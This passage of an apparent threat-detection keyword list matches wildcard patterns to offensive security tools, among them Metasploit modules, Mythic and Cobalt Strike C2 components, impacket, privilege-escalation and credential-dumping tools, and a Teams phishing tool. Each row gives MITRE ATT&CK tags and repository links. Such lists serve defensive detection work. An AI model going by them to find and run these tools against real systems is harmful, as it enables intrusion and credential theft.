TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/mspass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*msquic_openssl/msquic.dll*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*msquic_openssl/msquic.lib*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*MS-RPNVulnerableDC.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*MS-RPRN.exe *,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. Binary from here https://github.com/leechristensen/SpoolSample,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*MS-RPRN.exe \\* \\*/pipe/pwned*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*mssgbox_shellcode_arranged_x64.b64*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_exitfunc_thread_x64.bin*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64.b64*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64.bin*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64.bin*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64_with_hexsymbol.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssgbox_shellcode_x64_without_hexsymbol.txt*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mssql_brute.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mssql_local_auth_bypass.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mssql_local_hashdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mssqlattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*mssqlattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mssqlproxy-master*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*mssqlrelayclient.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mssqlrelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*mssqlsvc.kirbi*,offensive_tool_keyword,AD exploitation cheat sheet,Crack with TGSRepCrack,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mthbernardes*rsg*,offensive_tool_keyword,rsg,A tool to generate various ways to do a reverse shell,T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007,TA0002 - TA0011 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/mthbernardes/rsg,1,1,N/A,N/A,6,541,133,2023-04-27T10:32:21Z,2017-12-12T02:57:07Z -*mttaggart/OffensiveNotion*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*multi_meter_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*multi_vendor_cctv_dvr_pass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*multibit2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*MultiPotato.cpp*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*MultiPotato.exe*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*MultiPotato-main*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*--mutator N*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*mutator.py *,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*mvelazc0/BadZure*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*mwrlabs*,offensive_tool_keyword,Github Username,used to be a malware repo aso hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/mwrlabs,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*-my.sharepoint.com/personal/Fakeuser*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*-my.sharepoint.com/personal/TESTUSER_*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*my_dump_my_pe*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*myreallycooltotallyrealtenant.onmicrosoft.com*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*myseatbelt.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*mysql -u* -p c2 < c2_sample.sql*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*mysql_authbypass_hashdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mysql_file_enum.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mysql_hashdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mysql-privesc-race.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*Mystikal-main*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*mythic_c2_container*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_nginx*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_payloadtype*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_payloadtype*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_payloadtype_container*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_rest.Payload*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_service.py*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic_translator_containter*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*MythicAgents/Apollo*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*MythicAgents/Athena*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*MythicAgents/merlin*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*MythicAgents/tetanus*,offensive_tool_keyword,tetanus,Mythic C2 agent targeting Linux and Windows hosts written in Rust,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://github.com/MythicAgents/tetanus,1,1,N/A,N/A,3,229,33,2023-05-14T21:34:20Z,2022-03-07T20:35:33Z -*mythic-cli *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*mythic-cli*athena*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - 